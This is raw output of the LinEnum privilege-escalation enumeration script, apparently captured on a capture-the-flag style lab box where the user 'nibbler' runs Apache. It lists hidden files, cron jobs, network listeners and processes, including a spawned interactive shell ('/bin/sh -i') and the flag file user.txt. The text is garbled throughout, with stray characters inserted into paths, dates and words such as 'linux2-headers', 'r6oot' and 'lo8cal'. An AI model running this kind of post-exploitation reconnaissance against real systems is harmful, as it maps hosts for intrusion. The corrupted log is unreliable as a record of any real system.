root root 3362 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/tools/.relocs_64.o.cmd -rw-r--r-- 1 root root 3362 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/to/ols/.relocs_32.o.cmd -rw-r--r-- 1 root root 402 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 292 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 292 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 320 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 316 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 340 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 315 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd -rw-r--r-- 1 root root 320 Dec 11 2017 /usr/src/linux-headers-4.4.00-104-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 22 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/.29686.d -rw-r--r-- 1 root root 14210 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 190528 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/.config.old -rw-r--r-- 1 root root 820 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/.missing-syscalls.d -rw-r--r-- 1 root root 190404 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/.config -rw-r--r-- 1 root root 2391 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 5191 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 104 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 2289 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 25317 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 546 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.devicetable-offsets.h.cmd -rw-r--r-- 1 root root 4451 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 129 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 3485 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 4622 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 2380 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 3568 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 3253 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.asn1_compiler.cmd -rw-r--r-- 1 root root 3972 Dec 4 2017 /usr/src/linux2-headers-4.4.0-103-generic/scripts/.insert-sys-cert.cmd -rw-r--r-- 1 root root 3755 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 110 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 4917 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 2719 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/genksyms/.genksyms.o.cmd -rw-r--r-- 1 root root 153 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/genksyms/.genksyms.cmd -rw-r--r-- 1 root root 2481 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/genksyms/.parse.tab.o.cmd -rw-r--r-- 1 root root 3347 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/genksyms/.lex.lex.o.cmd -rw-r--r-- 1 root root 2839 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 3239 Dec 4 2017 /usr/src/linux-headers-34.4.0-103-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 5133 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 3387 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 1193 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/basic/.bin2c.cmd -rw-r--r-- 1 root root 4268 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 4495 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 54037 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 1304 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 1374 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root root 333 Dec 4 2017 /usr/src/linux-headers-4.4.0-1403-generic/arch/x86/purgatory/.purgatory.ro.cmd -rw-r--r-- 1 root root 9092 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 root root 3601 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 155 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3615 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 1324 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 146 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 3342 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 root root 3362 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/tools/.relocs_64.o.cmd -rw-r--r-- 1 root root 3362 Dec 4 2017 /usr5/src/linux-headers-4.4.0-103-generic/arch/x86/tools/.relocs_32.o.cmd -rw-r--r-- 1 root root 402 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 292 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 292 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 320 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 316 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 340 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 315 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd -rw-r--r-- 1 root r6oot 320 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 14210 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 190528 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/.config.old -rw-r--r-- 1 root root 820 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/.missing-syscalls.d -rw-r--r-- 1 root root 22 Dec 4 2017 /usr/src/linux-headers-4.4.0-103-generic/.29171.d -rw-r--r-- 1 root root 1391 Dec 10 2017 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 102 Apr 5 2016 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 1065 Dec 28 2017 /etc/init.d/.depend.start -rw-r--r-- 1 root root 1183 Dec 28 2017 /etc/init.d/.depend.boot -rw-r--r-- 1 root root 1209 Dec 28 2017 /etc/init.d/.depend.stop -rw-r--r-- 1 root root 102 Apr 5 2016 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 102 Apr 5 2016 /etc/cron.d/.placeholder -rw-r--r-- 1 root root 3771 Aug 31 20715 /etc/skel/.bashrc -rw-r--r-- 1 root root 655 Jun 24 2016 /etc/skel/.profile -rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout -rw-r--r-- 1 root root 102 Apr 5 2016 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Apr 5 2016 /etc/cron.daily/.placeholder -rw------- 1 root root 0 Jul 19 2016 /etc/.pwd.lock [-] Home directory contents: total 20K drwxr-xr-x 3 nibbler nibbler 4.0K Dec 29 2017 . drwxr-xr-x 3 root root 4.0K Dec 10 2017 .. -rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history drwxrwxr-x 2 nibbler nibbler 4.0K Dec 10 2017 .nano -r-------- 1 nibbler nibbler 1.9K Dec 10 2017 personal.zip -r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: APACHE_PID_FILE=/var/run/apache2/apache2.pid APACHE_RUN_USER=nibbler APACHE_LOG_DIR=/var/log/apache2 PATH=/usr/lo8cal/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PWD=/tmp APACHE_RUN_GROUP=nibbler LANG=C SHLVL=1 APACHE_LOCK_DIR=/var/lock/apache2 APACHE_RUN_DIR=/var/run/apache2 _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin drwxr-xr-x 2 root root 12288 Dec 28 2017 /bin drwxr-xr-x 2 root root 12288 Dec 28 2017 /sbin drwxr-xr-x 2 root root 28672 Dec 28 2017 /usr/bin drwxr-xr-x 2 root root 4096 Jul 19 2016 /usr/local/bin drwxr-xr-x 2 root root 4096 Jul 19 2016 /usr/local/sbin drwxr-xr-x 2 root root 12288 Dec 28 2017 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux /usr/bin/screen [-] Current umask value: 0000 u=rwx,g=rwx,o=rwx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/T9ASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab /etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Dec 28 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rw-r--r-- 1 root root 589 Jul 16 2014 mdadm -rw-r--r-- 1 root root 712 Sep 5 2017 php -rw-r--r-- 1 root root 191 Sep 22 2017 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Dec 28 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 539 Apr 5 2016 apache2 -rwxr-xr-x 1 root root 376 Mar 31 2016 apport -rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg -rwxr-xr-x 1 root root 372 May 6 2015 logrotate -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db -rwxr-xr-x 1 root root 539 Jul 16 :2014 mdadm -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder /etc/cron.weekly: total 24 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you ;don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Fri 2020-04-10 11:09:00 EDT 11min left Fri 2020-04-10 10:39:12 EDT 18min ago phpsessionclean.timer phpsessionclean.service Fri 2020-04-10 19:07:35 EDT 8h left Fri 2<020-04-10 10:08:02 EDT 49min ago apt-daily.timer apt-daily.service Sat 2020-04-11 06:13:21 EDT 19h left Fri 2020-04-10 10:08:02 EDT 49min ago apt-daily-upgrade.timer apt-daily-upgrade.service Sat 2020-04-11 10:22:51 EDT 23h left Fri 2020-04-10 10:22:51 EDT 35min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2020-04-13 00:59:17 EDT 2 days left Fri 2020-04-10 10:25:51 EDT 32min ago snapd.refresh.timer snapd.refresh.service n/a n/a n/a n/a snap-repair.timer n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service 8 timers listed. ### NETWORKING ########################################## [-] Network and IP info: ens32 Link encap:Ethe=rnet HWaddr 00:50:56:b9:f9:e4 inet addr:10.10.10.75 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::250:56ff:feb9:f9e4/64 Scope:Global inet6 addr: fe80::250:56ff:feb9:f9e4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:25447 errors:0 dropped:0 overruns:0 frame:0 TX packets:23150 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4089756 (4.0 MB) TX bytes:11240002 (11.2 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:260 errors:0 dropped:0 overruns:0 frame:0 TX packets:260 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:21612 (21.6 KB) TX bytes:21612 (21.6 KB) [-] ARP history: ? (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens32 > [-] Nameserver(s): nameserver 10.10.10.2 [-] Default route: default 10.10.10.2 0.0.0.0 UG 0 0 0 ens32 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name ### SERVICES ############################################# [-] Running processes: USER ? PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.1 0.6 119920 6088 ? Ss 10:07 0:03 /sbin/init root 2 0.0 0.0 0 0 ? S 10:07 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 10:07 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 10:07 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S 10:07 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 10:07 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 10:07 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S 10:07 0:00 [watchdog/0] root 11 0.0 0.0 0 0 ? S 10:07 0:00 [kdevtmpfs] root 12 0.0 0.0 0 0 ? S< 10:07 0:00 [netns] root 13 0.0 0.0 0 0 ? S< 10:07 0:00 [perf] root 14 0.0 0.0 0 0 ? S 10:07 0:00 [khungtaskd] root @ 15 0.0 0.0 0 0 ? S< 10:07 0:00 [writeback] root 16 0.0 0.0 0 0 ? SN 10:07 0:00 [ksmd] root 17 0.0 0.0 0 0 ? SN 10:07 0:00 [khugepaged] root 18 0.0 0.0 0 0 ? S< 10:07 0:00 [crypto] root 19 0.0 0.0 0 0 ? S< 10:07 0:00 [kintegrityd] root 20 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 21 0.0 0.0 0 0 ? S< 10:07 0:00 [kblockd] root 22 0.0 0.0 0 0 ? S< 10:07 0:00 [ata_sff] root 23 0.0 0.0 0 0 ? S< 10:07 0:00 [md] root 24 0.0 0.0 0 0 ? S< 10:07 0:00 [devfreq_wq] root 28 0.0 0.0 0 0 ? S 10:07 0:00 [kswapd0] root 29 0.0 0.0 0 0 ? S< 10:07 0:00 [vmstat] root 30 0.0 0.0 0 0 ? S 10:07 0:00 [fsnotify_mark] root A 31 0.0 0.0 0 0 ? S 10:07 0:00 [ecryptfs-kthrea] root 47 0.0 0.0 0 0 ? S< 10:07 0:00 [kthrotld] root 48 0.0 0.0 0 0 ? S< 10:07 0:00 [acpi_thermal_pm] root 49 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 50 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 51 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 52 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 53 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 54 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 55 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 56 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 57 0.0 0.0 0 0 ? S 10:07 0:00 [scsi_eh_0] root 58 0.0 0.0 0 0 ? S< 10:07 0:00 [scsi_tmBf_0] root 59 0.0 0.0 0 0 ? S 10:07 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? S< 10:07 0:00 [scsi_tmf_1] root 61 0.0 0.0 0 0 ? S 10:07 0:00 [kworker/u256:2] root 67 0.0 0.0 0 0 ? S< 10:07 0:00 [ipv6_addrconf] root 80 0.0 0.0 0 0 ? S< 10:07 0:00 [deferwq] root 81 0.0 0.0 0 0 ? S< 10:07 0:00 [charger_manager] root 82 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 83 0.0 0.0 0 0 ? S 10:07 0:00 [kworker/u256:4] root 142 0.0 0.0 0 0 ? S 10:07 0:00 [scsi_eh_2] root 143 0.0 0.0 0 0 ? S< 10:07 0:00 [scsi_tmf_2] root 144 0.0 0.0 0 0 ? S< 10:07 0:00 [vmw_pvscsi_wq_2] root 145 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 162 0.0 0.0 0 C 0 ? S< 10:07 0:00 [kpsmoused] root 163 0.0 0.0 0 0 ? S< 10:07 0:00 [ttm_swap] root 262 0.0 0.0 0 0 ? S< 10:07 0:00 [raid5wq] root 287 0.0 0.0 0 0 ? S< 10:07 0:00 [kdmflush] root 288 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 298 0.0 0.0 0 0 ? S< 10:07 0:00 [kdmflush] root 299 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 315 0.0 0.0 0 0 ? S< 10:07 0:00 [bioset] root 339 0.0 0.0 0 0 ? S 10:07 0:00 [jbd2/dm-0-8] root 340 0.0 0.0 0 0 ? S< 10:07 0:00 [ext4-rsv-conver] root 386 0.0 0.0 0 0 ? S< 10:07 0:00 [kworker/0:1H] root 393 0.0 0.0 0 0 ? S< 10:07 0:00 [iscsi_eh] root 403 0.0 0.0 0 0 ? S< 10:07 0:00 [ib_addr] root D 410 0.0 0.0 0 0 ? S< 10:07 0:00 [ib_mcast] root 411 0.0 0.0 0 0 ? S< 10:07 0:00 [ib_nl_sa_wq] root 414 0.0 0.0 0 0 ? S< 10:07 0:00 [ib_cm] root 415 0.0 0.2 28336 2712 ? Ss 10:07 0:00 /lib/systemd/systemd-journald root 419 0.0 0.0 0 0 ? S 10:07 0:00 [kauditd] root 421 0.0 0.0 0 0 ? S< 10:07 0:00 [iw_cm_wq] root 426 0.0 0.0 0 0 ? S< 10:07 0:00 [rdma_cm] root 442 0.0 0.1 102972 1564 ? Ss 10:07 0:00 /sbin/lvmetad -f root 455 0.0 0.4 45488 4856 ? Ss 10:07 0:00 /lib/systemd/systemd-udevd root 717 0.0 0.0 0 0 ? S< 10:07 0:00 [ext4-rsv-conver] systemd+ 746 0.0 0.2 100324 2348 ? Ssl 10:08 0:00 /lib/systemd/systemd-timesyncd root 883 0.0 0.1 4400 1360 ? Ss 10:08 0:00 /usr/sbin/acpid root 884 0E.0 0.6 275860 6100 ? Ssl 10:08 0:00 /usr/lib/accountsservice/accounts-daemon root 892 0.0 0.0 0 0 ? S 10:08 0:01 [kworker/0:5] root 899 0.0 0.2 20104 2856 ? Ss 10:08 0:00 /lib/systemd/systemd-logind syslog 903 0.0 0.3 260632 3376 ? Ssl 10:08 0:00 /usr/sbin/rsyslogd -n message+ 904 0.0 0.3 42944 3784 ? Ss 10:08 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation daemon 927 0.0 0.2 26048 2016 ? Ss 10:08 0:00 /usr/sbin/atd -f root 928 0.0 0.2 29012 2684 ? Ss 10:08 0:00 /usr/sbin/cron -f root 930 0.0 0.9 185612 9828 ? Ssl 10:08 0:02 /usr/bin/vmtoolsd root 939 0.0 0.3 621748 3672 ? Ssl 10:08 0:01 /usr/bin/lxcfs /var/lib/lxcfs/ root 978 0.0 2.2 203148 22676 ? Ssl 10:08 0:00 /usr/lib/snapd/snapd root 983 0.0 0.5 277092 5888 ? Ssl 10:08 0:00 /usr/lib/poFlicykit-1/polkitd --no-debug root 999 0.0 0.0 13376 168 ? Ss 10:08 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog root 1115 0.0 0.5 65524 5264 ? Ss 10:08 0:00 /usr/sbin/sshd -D root 1137 0.0 0.0 5224 160 ? Ss 10:08 0:00 /sbin/iscsid root 1138 0.0 0.3 5724 3520 ? S<Ls 10:08 0:00 /sbin/iscsid mysql 1142 0.0 15.2 1115980 152384 ? Ssl 10:08 0:00 /usr/sbin/mysqld root 1200 0.0 0.1 15940 1600 tty1 Ss+ 10:08 0:00 /sbin/agetty --noclear tty1 linux root 1316 0.0 1.7 328296 17900 ? Ss 10:08 0:00 /usr/sbin/apache2 -k start nibbler 1489 0.0 0.9 328548 9424 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1490 0.0 1.4 328952 14172 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1492 0.0 1.5 331960 15252 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1493 0.0 1.4 331944 14600 ? G S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1498 0.0 1.3 328928 13104 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1499 0.0 1.5 332456 15732 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1500 0.0 0.9 328548 9460 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1502 0.0 0.9 328540 9420 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1503 0.0 1.5 332472 15528 ? S 10:13 0:00 /usr/sbin/apache2 -k start nibbler 1513 0.0 1.5 331948 15096 ? S 10:30 0:00 /usr/sbin/apache2 -k start root 1518 0.0 0.0 0 0 ? S 10:39 0:00 [kworker/0:1] nibbler 1573 0.0 0.0 4508 648 ? S 10:50 0:00 sh -c uname -a; w; id; /bin/sh -i nibbler 1577 0.0 0.0 4508 652 ? S 10:50 0:00 /bin/sh -i nibbler 1582 0.0 0.2 19028 2780 ? S 10:57 0:00 /bin/bash ./LinEnum.sh -t nibbler 1583 0.0 0.3 19200 3540 ? S 10:57 H0:00 /bin/bash ./LinEnum.sh -t nibbler 1584 0.0 0.0 4384 820 ? S 10:57 0:00 tee -a root 1707 0.0 0.0 0 0 ? S 10:57 0:00 [kworker/0:0] root 1709 0.0 0.0 0 0 ? S 10:57 0:00 [kworker/u256:0] nibbler 2044 0.0 0.2 19200 2984 ? S 10:58 0:00 /bin/bash ./LinEnum.sh -t nibbler 2045 0.0 0.2 34428 2992 ? R 10:58 0:00 ps aux [-] Process binaries and associated permissions (from above list): -rwxr-xr-x 1 root root 1037528 May 16 2017 /bin/bash lrwxrwxrwx 1 root root 4 Sep 22 2017 /bin/sh -> dash -rwxr-xr-x 1 root root 326224 Oct 27 2017 /lib/systemd/systemd-journald -rwxr-xr-x 1 root root 618520 Oct 27 2017 /lib/systemd/systemd-logind -rwxr-xr-x 1 root root 141904 Oct 27 2017 /lib/systemd/systemd-timesyncd -rwxr-xr-x 1 root root 453240 Oct 27 2017 /lib/systemd/systemd-udevd -rwxr-xr-x 1 root root 44104 Jun 14 2017 /sbin/agetty lrwxrwxrwx 1 root root 20 OIct 27 2017 /sbin/init -> /lib/systemd/systemd -rwxr-xr-x 1 root root 783984 Jul 26 2017 /sbin/iscsid -rwxr-xr-x 1 root root 51336 Apr 16 2016 /sbin/lvmetad -rwxr-xr-x 1 root root 513216 Nov 8 2017 /sbin/mdadm -rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon -rwxr-xr-x 1 root root 18504 Nov 8 2017 /usr/bin/lxcfs -rwxr-xr-x 1 root root 44528 Feb 9 2017 /usr/bin/vmtoolsd -rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon -rwxr-xr-x 1 root root 15048 Jan 17 2016 /usr/lib/policykit-1/polkitd -rwxr-xr-x 1 root root 21178072 Nov 30 2017 /usr/lib/snapd/snapd -rwxr-xr-x 1 root root 48112 Apr 8 2016 /usr/sbin/acpid -rwxr-xr-x 1 root root 662496 Sep 18 2017 /usr/sbin/apache2 -rwxr-xr-x 1 root root 26632 Jan 14 2016 /usr/sbin/atd -rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron -rwxr-xr-x 1 root root 24803912 Oct 18 2017 /usr/sbin/mysqld -rwxr-xr-x 1 root root 599328 Apr 5 2016 /usr/sbin/rsyslogd -rwxr-xr-x 1J root root 799216 Mar 16 2017 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 324 drwxr-xr-x 2 root root 4096 Dec 28 2017 . drwxr-xr-x 92 root root 4096 Dec 28 2017 .. -rw-r--r-- 1 root root 1183 Dec 28 2017 .depend.boot -rw-r--r-- 1 root root 1065 Dec 28 2017 .depend.start -rw-r--r-- 1 root root 1209 Dec 28 2017 .depend.stop -rw-r--r-- 1 root root 2427 Jan 19 2016 README -rwxr-xr-x 1 root root 2243 Feb 9 2016 acpid -rwxr-xr-x 1 root root 2210 Apr 5 2016 apache-htcacheclean -rwxr-xr-x 1 root root 8087 Apr 5 2016 apache2 -rwxr-xr-x 1 root root 6223 Mar 3 2017 apparmor -rwxr-xr-x 1 root root 